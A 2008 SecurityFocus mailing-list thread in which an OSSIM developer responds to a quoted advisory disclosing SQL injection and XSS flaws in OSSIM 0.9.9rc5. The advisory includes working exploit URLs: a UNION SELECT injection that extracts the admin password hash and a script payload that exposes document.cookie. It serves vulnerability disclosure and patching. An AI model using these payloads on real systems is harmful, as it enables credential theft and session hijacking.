SQL-injection, XSS in OSSIM (Open Source Security Information Management) Feb 21 2008 12:47PM
marcin kopec hotmail com (1 replies)
Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management) Feb 22 2008 07:50AM
Dominique Karg (dk ossim net)

I can confirm this affecting earlier versions as well, the XSS has
been fixed some months ago, the SQL Injection (and others) were caused
by a failure in the "punctuation" validation regexp. Just fixed that
one as well as some others.

We're going to release a fixed version asap after stopping development
in order to get a throughout security audit done. The SQL regexp I
just fixed and we'll update the packages today.

Nonetheless, exposure should be minimal since:

a) You aren't going to provide public access to your SIM console,
aren't you ?
b) Regarding the specific SQL injection mentioned in here (as said,
there are more we're going to fix), you shouldn't give access to the
policy section to normal users either.

I must thank you for pointing this out but would've appreciate a more
"direct" contact, as it is considered a polite way of releasing bugs.



Am 21.02.2008 um 13:47 schrieb marcin.kopec (at) hotmail (dot) com [email concealed]:

> Application: OSSIM
> http://www.ossim.net
> Version: 0.9.9rc5
> Note: it is possible that the problem affects also earlier OSSIM
> versions
> Platforms: Linux
> Bug: SQL injection, Cross Site Scripting
> Exploitation: remote
> Date: 21 Feb 2008
> Author: Marcin Kopec
> E-mail: marcin(dot)kopec(at)hotmail(dot)com
> ---------------------------------------
> 1) Introduction
> OSSIM it's a free implementation of Security Information Management
> (SIM) system, equipped with many useful security tools (nessus,
> snort, p0f, ntop, ...) managed from easy-to-use web panel.
> 2) SQL injection
> The bug exist in portname parameter of modifyportform.php
> It's possible to obtain hashed administrator password when user have
> rights to do port modification in "PORTS" tab.
> http://[host]/ossim/port/modifyportform.php?portname=ANY'%20and
> %201=2%20union%20select%20pass,2%20from%20ossim.users%20where
> %20login='admin
> 3) XSS
> Quotes in OSSIM aren't property sanitized.
> Below XSS may be executed without logging into the OSSIM.
> http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript
> %3Ealert(document.cookie)%3C/script%3E%3C!--

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus